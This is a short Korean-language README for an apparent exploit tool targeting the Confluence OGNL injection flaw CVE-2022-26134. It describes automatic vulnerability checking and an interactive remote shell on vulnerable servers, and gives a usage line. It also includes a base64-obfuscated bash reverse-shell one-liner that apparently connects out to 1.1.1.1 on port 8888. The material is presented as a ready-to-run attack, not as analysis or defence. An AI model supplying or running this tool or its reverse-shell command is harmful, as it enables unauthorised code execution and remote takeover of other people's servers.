
[CVE-2022-26134] 샌드박스 우회가 포함된 Confluence OGNL 표현식 주입 RCE
Confluence OGNL 표현식 주입 RCE(CVE-2022-26134) PoC 및 익스플로잇
샌드박스 우회 추가, 높은 버전 지원.
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
스크립트는 자동으로 대상이 취약한지 확인하고, 취약한 경우 유사 인터랙티브 셸로 진입합니다.
Linux에서 테스트:

Windows에서 테스트:

종료하려면 'q'를 입력하세요.
명령어 매개변수는 셸 컨텍스트가 없는 runtime.exec 메서드에 직접 전달됩니다.
그러므로.
Windows의 경우, dir과 같은 일부 명령어는 직접 실행할 수 없으며, cmd.exe /c dir을 사용할 수 있습니다.
Linux의 경우, 일부 특수 기호가 적용되지 않습니다. 역방향 셸과 같은 특수 기호가 포함된 명령어를 실행해야 하는 경우 base64로 인코딩한 후 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}를 사용할 수 있습니다.